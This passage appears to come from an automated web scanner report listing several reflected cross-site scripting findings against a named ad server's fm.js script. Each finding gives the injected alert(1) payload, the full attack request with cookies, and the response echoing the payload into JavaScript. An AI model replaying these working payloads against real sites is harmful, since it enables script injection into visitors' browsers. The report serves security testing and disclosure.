Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',2315b";alert(1)//bc620037b7e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,2315b";alert(1)//bc620037b7e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cd2c'%3balert(1)//2d011e94584 was submitted in the $ parameter. This input was echoed as 5cd2c';alert(1)//2d011e94584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=5cd2c'%3balert(1)//2d011e94584&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:5cd2c';alert(1)//2d011e94584;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',5cd2c';alert(1)//2d011e94584';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5cd2c';alert(1)//2d011e94584;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab871'%3balert(1)//3d87bda826d was submitted in the $ parameter. This input was echoed as ab871';alert(1)//3d87bda826d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ab871'%3balert(1)//3d87bda826d&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ab871';alert(1)//3d87bda826d;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:06 GMT
Connection: close
Content-Length: 2069

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ab871';alert(1)//3d87bda826d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ab871';alert(1)//3d87bda826d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34260"%3balert(1)//38aea2a88ac was submitted in the $ parameter. This input was echoed as 34260";alert(1)//38aea2a88ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=34260"%3balert(1)//38aea2a88ac&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:34260";alert(1)//38aea2a88ac;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1504B1120,1#822421|0,1,1;expires=Wed, 16 Mar 2011 01:15:05 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:05 GMT
Connection: close
Content-Length: 2866

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',34260";alert(1)//38aea2a88ac';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,34260";alert(1)//38aea2a88ac;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=1;u=INmz6woBAD
...[SNIP]...

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f4e5'-alert(1)-'557283196c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?1f4e5'-alert(1)-'557283196c1=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:56 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=1f4e5'-alert(1)-'557283196c1=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c4b'%3balert(1)//c3552fa4464 was submitted in the q parameter. This input was echoed as 16c4b';alert(1)//c3552fa4464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=16c4b'%3balert(1)//c3552fa4464&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='16c4b';alert(1)//c3552fa4464';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=16c4b';alert(1)//c3552fa4464;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf1d"%3balert(1)//afba566bf60 was submitted in the q parameter. This input was echoed as cdf1d";alert(1)//afba566bf60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=cdf1d"%3balert(1)//afba566bf60&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
